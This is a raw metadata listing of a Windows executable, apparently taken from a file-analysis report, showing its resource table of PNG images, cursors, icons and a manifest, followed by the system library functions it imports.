                                                                                      PNG0x60e1740x5c1PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0074677528852682
                                                                                      PNG0x60e7380x539PNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082273747195214
                                                                                      PNG0x60ec740x5c7PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0074374577417173
                                                                                      PNG0x60f23c0x47fPNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009556907037359
                                                                                      PNG0x60f6bc0x585PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077848549186128
                                                                                      PNG0x60fc440x546PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0081481481481482
                                                                                      PNG0x61018c0x4e1PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0088070456365092
                                                                                      PNG0x6106700x5b0PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007554945054945
                                                                                      PNG0x610c200x1b3PNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.025287356321839
                                                                                      PNG0x610dd40xeaPNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0299145299145298
                                                                                      PNG0x610ec00x1ad9PNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0016004655899897
                                                                                      PNG0x61299c0xb43PNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038154699965314
                                                                                      PNG0x6134e00x609PNG image data, 11 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071197411003237
                                                                                      PNG0x613aec0x18aePNG image data, 43 x 234, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017410572966128
                                                                                      PNG0x61539c0x1177PNG image data, 43 x 135, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0024602997092373
                                                                                      PNG0x6165140x25ecPNG image data, 43 x 330, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011330861145447
                                                                                      PNG0x618b000xad3PNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039696860339227
                                                                                      PNG0x6195d40xbc8PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036472148541113
                                                                                      PNG0x61a19c0xc2ePNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035279025016035
                                                                                      PNG0x61adcc0x5ddPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0073284477015323
                                                                                      PNG0x61b3ac0x597PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0076869322152342
                                                                                      PNG0x61b9440x5f8PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007198952879581
                                                                                      PNG0x61bf3c0x228PNG image data, 54 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.019927536231884
                                                                                      PNG0x61c1640x588PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077683615819208
                                                                                      PNG0x61c6ec0x38aPNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0121412803532008
                                                                                      PNG0x61ca780x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                      PNG0x61cfac0x32fPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0134969325153373
                                                                                      PNG0x61d2dc0xef8PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9950417536534447
                                                                                      PNG0x61e1d40x7cPNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9919354838709677
                                                                                      PNG0x61e2500x13c1PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021752026893416
                                                                                      PNG0x61f6140x37dPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123180291153415
                                                                                      PNG0x61f9940x395PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119956379498365
                                                                                      PNG0x61fd2c0x125ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023394300297745
                                                                                      PNG0x620f8c0x13b4PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021808088818398
                                                                                      PNG0x6223400x369PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126002290950744
                                                                                      PNG0x6226ac0x3ccPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113168724279835
                                                                                      PNG0x622a780x1320PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002246732026144
                                                                                      PNG0x623d980x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                      PNG0x6251440x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                      PNG0x6254a80x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                      PNG0x6258640x1274PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023285351397122
                                                                                      PNG0x626ad80x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                      PNG0x627e780x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                      PNG0x6281f80x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                      PNG0x62854c0x1288PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002318718381113
                                                                                      PNG0x6297d40x99dPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004469727752946
                                                                                      PNG0x62a1740x2e6PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0148247978436657
                                                                                      PNG0x62a45c0x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                      PNG0x62b80c0x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                      PNG0x62bb740x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                      PNG0x62bee80x126bPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023329798515377
                                                                                      PNG0x62d1540xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                      PNG0x62d2280x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                      PNG0x62e5bc0x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                      PNG0x62e9300x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                      PNG0x62ed240x1304PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022596548890714
                                                                                      PNG0x6300280x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                      PNG0x6313c00x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                      PNG0x6317340x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                      PNG0x631a740x119ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002439024390244
                                                                                      PNG0x632c140xa6PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                      PNG0x632cbc0x99dPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004469727752946
                                                                                      PNG0x63365c0x2f7PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                      PNG0x6339540x17ePNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0287958115183247
                                                                                      PNG0x633ad40x71PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9911504424778761
                                                                                      PNG0x633b480x117PNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021505376344086
                                                                                      PNG0x633c600x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                      PNG0x633cc80xd7PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0232558139534884
                                                                                      PNG0x633da00xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                      PNG0x6347e00x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                      PNG0x634a640x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                      PNG0x634af80x96aPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004564315352697
                                                                                      PNG0x6354640x99bPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0044733631557543
                                                                                      PNG0x635e000x2f7PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                      PNG0x6360f80x1d3PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.019271948608137
                                                                                      PNG0x6362cc0x1f8PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0138888888888888
                                                                                      PNG0x6364c40x67PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States0.9514563106796117
                                                                                      PNG0x63652c0x95PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                      PNG0x6365c40x39dPNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011891891891892
                                                                                      PNG0x6369640x39dPNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011891891891892
                                                                                      PNG0x636d040x1c1PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.024498886414254
                                                                                      PNG0x636ec80x153PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0324483775811208
                                                                                      PNG0x63701c0x15fPNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113960113960114
                                                                                      PNG0x63717c0x100PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.03515625
                                                                                      PNG0x63727c0x108PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.018939393939394
                                                                                      PNG0x6373840xb6PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010989010989011
                                                                                      PNG0x63743c0x151PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.032640949554896
                                                                                      PNG0x6375900x135PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.029126213592233
                                                                                      PNG0x6376c80xdd3PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960440802486578
                                                                                      PNG0x63849c0x129PNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0303030303030303
                                                                                      PNG0x6385c80x10bPNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.0337078651685394
                                                                                      PNG0x6386d40x87PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0074074074074073
                                                                                      PNG0x63875c0x12fPNG image data, 9 x 9, 8-bit/color RGB, non-interlacedEnglishUnited States1.0264026402640265
                                                                                      PNG0x63888c0x48dPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009442060085837
                                                                                      PNG0x638d1c0xd5cPNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003216374269006
                                                                                      PNG0x639a780x38dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012101210121012
                                                                                      PNG0x639e080x265PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0179445350734095
                                                                                      PNG0x63a0700x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0268456375838926
                                                                                      PNG0x63a19c0xcb5PNG image data, 10 x 28, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033814940055334
                                                                                      PNG0x63ae540xb8bPNG image data, 10 x 28, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037225042301186
                                                                                      PNG0x63b9e00xb50PNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037983425414365
                                                                                      PNG0x63c5300x2885PNG image data, 42 x 348, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0010604453870626
                                                                                      PNG0x63edb80xd8ePNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031700288184437
                                                                                      PNG0x63fb480x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                      PNG0x6400840x10a5PNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025815536259095
                                                                                      PNG0x64112c0x1035PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002651241262955
                                                                                      PNG0x6421640xe81PNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0029625639644493
                                                                                      PNG0x642fe80xedbPNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0028924533263213
                                                                                      PNG0x643ec40xf2fPNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0028299459737586
                                                                                      PNG0x644df40xeeePNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0028780743066457
                                                                                      PNG0x645ce40xe64PNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002985884907709
                                                                                      PNG0x646b480xf4bPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0028097062579822
                                                                                      PNG0x647a940xf36PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002824858757062
                                                                                      PNG0x6489cc0xe9bPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0029419630917358
                                                                                      PNG0x6498680xfa9PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0027438263906212
                                                                                      PNG0x64a8140x1b3PNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.025287356321839
                                                                                      PNG0x64a9c80xeaPNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0299145299145298
                                                                                      PNG0x64aab40x1936PNG image data, 56 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001704369383328
                                                                                      PNG0x64c3ec0xb43PNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038154699965314
                                                                                      RT_GROUP_CURSOR0x6c5dc80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5ddc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5df00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5e040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5e180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5e2c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                      RT_GROUP_CURSOR0x6c5e400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5e540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5e680x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                      RT_GROUP_CURSOR0x6c5e8c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5ea00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5eb40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5ec80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5edc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5ef00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f2c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f7c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_CURSOR0x6c5f900x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                      RT_GROUP_ICON0x6c5fa40x5adataEnglishUnited States0.7666666666666667
                                                                                      RT_GROUP_ICON0x6c60000x22dataEnglishUnited States1.0588235294117647
                                                                                      RT_GROUP_ICON0x6c60240x22dataEnglishUnited States1.0588235294117647
                                                                                      RT_GROUP_ICON0x6c60480x30dataEnglishUnited States0.9375
                                                                                      RT_GROUP_ICON0x6c60780x22dataEnglishUnited States1.1176470588235294
                                                                                      RT_VERSION0x6c609c0x344dataEnglishUnited States0.45454545454545453
                                                                                      RT_MANIFEST0x6c63e00x357ASCII text, with very long lines (855), with no line terminatorsEnglishUnited States0.45146198830409356
                                                                                      None0x6c67380x17bdataEnglishUnited States0.39313984168865435
                                                                                      None0x6c68b40x590dataEnglishUnited States0.16362359550561797
                                                                                      None0x6c6e440x46ddataEnglishUnited States0.14386584289496912
                                                                                      None0x6c72b40x5e6dataEnglishUnited States0.1119205298013245
                                                                                      None0x6c789c0x2f4dataEnglishUnited States0.20634920634920634
                                                                                      None0x6c7b900x1cdataEnglishUnited States1.2857142857142858
                                                                                      None0x6c7bac0x18dataEnglishUnited States1.2916666666666667
DLL | Import
SHELL32.dll | SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHAppBarMessage, SHGetFileInfoW, SHGetFolderPathW, DragAcceptFiles, SHOpenFolderAndSelectItems, CommandLineToArgvW, ShellExecuteW, DragFinish, DragQueryFileW
KERNEL32.dll | GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, WriteConsoleW, SetEnvironmentVariableA, LCMapStringW, GetConsoleMode, GetStringTypeW, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, IsDebuggerPresent, UnhandledExceptionFilter, TerminateProcess, GetTimeZoneInformation, IsProcessorFeaturePresent, QueryPerformanceCounter, HeapCreate, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStdHandle, SetUnhandledExceptionFilter, GetFileType, SetStdHandle, VirtualQuery, GetSystemInfo, VirtualAlloc, InterlockedCompareExchange, GetSystemTimeAsFileTime, HeapSize, HeapQueryInformation, ExitProcess, RaiseException, RtlUnwind, HeapReAlloc, HeapAlloc, CreateThread, ExitThread, DecodePointer, EncodePointer, HeapFree, GetStartupInfoW, HeapSetInformation, GetCommandLineW, FindResourceExW, GetUserDefaultLCID, SetErrorMode, VirtualProtect, SearchPathW, GetProfileIntW, GetNumberFormatW, GetWindowsDirectoryW, GetTempPathW, GetTempFileNameW, Sleep, GetFullPathNameW, GetVolumeInformationW, FindFirstFileW, FindClose, DuplicateHandle, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, lstrcmpiW, GetFileSize, GetSystemDirectoryW, InterlockedIncrement, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, LocalAlloc, GetThreadLocale, GlobalGetAtomNameW, GlobalFlags, SetThreadPriority, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileIntW, GetCurrentThread, GetUserDefaultUILanguage, ConvertDefaultLocale, GetSystemDefaultUILanguage, LoadLibraryExW, InterlockedExchange, InterlockedDecrement, ReleaseActCtx, CreateActCtxW, lstrcpyW, lstrlenA, lstrcmpA, GetCurrentProcessId, FreeResource, GlobalAddAtomW, GlobalFindAtomW, GlobalDeleteAtom, CompareStringW, InitializeCriticalSectionAndSpinCount, ActivateActCtx, DeactivateActCtx, lstrcmpW, CopyFileW, GlobalSize, lstrlenW, SetLastError, MultiByteToWideChar, ResumeThread, DeleteFileW, LocalLock, GetProcAddress, GetFileSizeEx, ReadFile, GetVersionExW, FormatMessageW, TerminateThread, WriteFile, GetTickCount, WaitForSingleObject, GetCurrentProcess, SetFilePointer, GlobalFree, GlobalUnlock, WideCharToMultiByte, GlobalAlloc, GlobalLock, FileTimeToLocalFileTime, CloseHandle, GetFileAttributesExW, GetFileTime, GetCurrentDirectoryW, CreateFileW, FileTimeToSystemTime, GetTimeFormatW, LocalFree, GetCurrentThreadId, GetLocalTime, GetLocaleInfoW, FreeLibrary, GetDateFormatW, DeleteCriticalSection, EnterCriticalSection, GetLastError, GetModuleFileNameW, GetFileAttributesW, LeaveCriticalSection, LoadLibraryW, InitializeCriticalSection, GetModuleHandleW, TryEnterCriticalSection, LockResource, MulDiv, SizeofResource, LoadResource, FindResourceW, GetConsoleCP
USER32.dll | CreateMenu, MapVirtualKeyExW, IsCharLowerW, SubtractRect, CharUpperBuffW, RegisterClipboardFormatW, HideCaret, InvertRect, CreateAcceleratorTableW, GetKeyboardState, GetKeyboardLayout, ToUnicodeEx, InvalidateRgn, CopyAcceleratorTableW, CharNextW, GetUpdateRect, TranslateMDISysAccel, DrawMenuBar, DefMDIChildProcW, DefFrameProcW, IsClipboardFormatAvailable, GetDoubleClickTime, UnregisterClassW, WaitMessage, PostThreadMessageW, DestroyAcceleratorTable, UnpackDDElParam, ReuseDDElParam, InsertMenuItemW, SetClassLongW, SetCursorPos, SetParent, CopyIcon, GetMenuDefaultItem, SetMenuDefaultItem, IsMenu, MonitorFromPoint, UpdateLayeredWindow, UnionRect, CharUpperW, NotifyWinEvent, MessageBeep, WindowFromPoint, DeleteMenu, SetLayeredWindowAttributes, EnumDisplayMonitors, RealChildWindowFromPoint, SystemParametersInfoW, DestroyMenu, GetMessageW, TranslateMessage, SetWindowContextHelpId, MapDialogRect, SetRect, IsZoomed, ShowOwnedPopups, PostQuitMessage, GetSysColorBrush, SetWindowRgn, DrawFrameControl, DrawEdge, GetMenuItemInfoW, LoadCursorW, EnableScrollBar, BringWindowToTop, CreatePopupMenu, FrameRect, IntersectRect, SetCursor, LoadImageW, GetIconInfo, CopyImage, DrawIconEx, DestroyIcon, GetNextDlgGroupItem, SetCapture, KillTimer, SetTimer, DrawFocusRect, OffsetRect, SetRectEmpty, IsRectEmpty, DestroyCursor, MapVirtualKeyW, GetKeyNameTextW, GetDesktopWindow, GetActiveWindow, CreateDialogIndirectParamW, GetNextDlgTabItem, EndDialog, InvalidateRect, DrawStateW, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, GrayStringW, DrawTextExW, DrawTextW, TabbedTextOutW, FillRect, GetWindowThreadProcessId, IsWindowEnabled, ShowWindow, MoveWindow, SetWindowTextW, IsDialogMessageW, CheckDlgButton, RegisterWindowMessageW, SendDlgItemMessageW, SendDlgItemMessageA, WinHelpW, IsChild, SetWindowsHookExW, CallNextHookEx, GetClassLongW, GetClassNameW, SetPropW, GetPropW, RemovePropW, SetFocus, EnableWindow, ReleaseCapture, GetCapture, SendMessageW, IsWindow, GetWindowTextLengthW, GetWindowTextW, GetForegroundWindow, GetLastActivePopup, SetActiveWindow, DispatchMessageW, BeginDeferWindowPos, EndDeferWindowPos, GetDlgItem, GetTopWindow, DestroyWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, PeekMessageW, MonitorFromWindow, GetMonitorInfoW, MapWindowPoints, ScrollWindow, TrackPopupMenu, GetKeyState, SetMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, IsWindowVisible, ValidateRect, PostMessageW, CreateWindowExW, GetClassInfoExW, GetClassInfoW, RegisterClassW, AdjustWindowRectEx, GetWindowRgn, GetAsyncKeyState, GetSysColor, RedrawWindow, ReleaseDC, GetDC, LoadStringW, GetCursorPos, ScreenToClient, LoadIconW, GetClientRect, GetWindowRect, LoadAcceleratorsW, TranslateAcceleratorW, SetClipboardData, OpenClipboard, EmptyClipboard, InflateRect, CloseClipboard, UpdateWindow, GetSystemMetrics, MessageBoxW, AppendMenuW, LoadMenuW, ModifyMenuW, DrawIcon, GetSubMenu, IsIconic, GetSystemMenu, CheckMenuItem, EnableMenuItem, GetMenuState, GetParent, GetFocus, LoadBitmapW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, RemoveMenu, GetMenuItemCount, InsertMenuW, GetMenuItemID, GetMenuStringW, GetWindow, PtInRect, CopyRect, SetWindowPos, SetWindowLongW, GetWindowLongW, GetMenu, CallWindowProcW, DefWindowProcW, GetDlgCtrlID, GetWindowPlacement, SetWindowPlacement, SetScrollInfo, GetScrollInfo, DeferWindowPos, EqualRect, LockWindowUpdate
GDI32.dll | SetPixel, SetDIBColorTable, RealizePalette, StretchBlt, OffsetRgn, GetRgnBox, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, GetSystemPaletteEntries, EnumFontFamiliesExW, ExtFloodFill, SetPaletteEntries, GetWindowOrgEx, PtInRegion, FillRgn, FrameRgn, DPtoLP, GetViewportOrgEx, LPtoDP, SetPixelV, GetTextFaceW, SelectPalette, GetStockObject, SetRectRgn, GetMapMode, GetTextCharsetInfo, EnumFontFamiliesW, CreateDIBitmap, RoundRect, Rectangle, CreateDIBSection, CreateRoundRectRgn, CreateCompatibleBitmap, Polygon, Ellipse, Polyline, GetTextColor, GetBkColor, CombineRgn, CreatePolygonRgn, CreateEllipticRgn, GetTextMetricsW, GetTextExtentPoint32W, PatBlt, CreateRectRgnIndirect, CreateHatchBrush, CreatePen, RestoreDC, SaveDC, SetBkColor, SetTextColor, CreateSolidBrush, GetObjectW, GetDeviceCaps, CreateFontIndirectW, CreateBitmap, CopyMetaFileW, GetBoundsRect, CreateDCW, CreateCompatibleDC, CreatePatternBrush, DeleteDC, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, OffsetWindowOrgEx, SetWindowOrgEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, ExtTextOutW, TextOutW, RectVisible, PtVisible, GetPixel, BitBlt, GetWindowExtEx, GetViewportExtEx, CreateRectRgn, SelectClipRgn, DeleteObject, SetLayout, GetLayout, SetTextAlign, MoveToEx, LineTo, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetROP2, SetPolyFillMode, SetBkMode, GetObjectType
MSIMG32.dll | TransparentBlt, AlphaBlend
COMDLG32.dll | GetFileTitleW
WINSPOOL.DRV | DocumentPropertiesW, ClosePrinter, OpenPrinterW
ADVAPI32.dll | CryptHashData, RegQueryValueExW, RegOpenKeyExW, RegCloseKey, RegSetValueExW, CryptAcquireContextW, CryptDeriveKey, CryptGetKeyParam, CryptReleaseContext, RegQueryInfoKeyW, RegEnumValueW, RegQueryValueW, RegEnumKeyW, RegDeleteValueW, RegCreateKeyExW, CryptDestroyHash, CryptDecrypt, RegEnumKeyExW, CryptDestroyKey, CryptCreateHash, CryptEncrypt, RegDeleteKeyW
COMCTL32.dll | InitCommonControlsEx, ImageList_GetIconSize
SHLWAPI.dll | PathStripToRootW, PathRemoveFileSpecW, PathFindFileNameW, PathRemoveExtensionW, PathFindExtensionW, PathIsUNCW
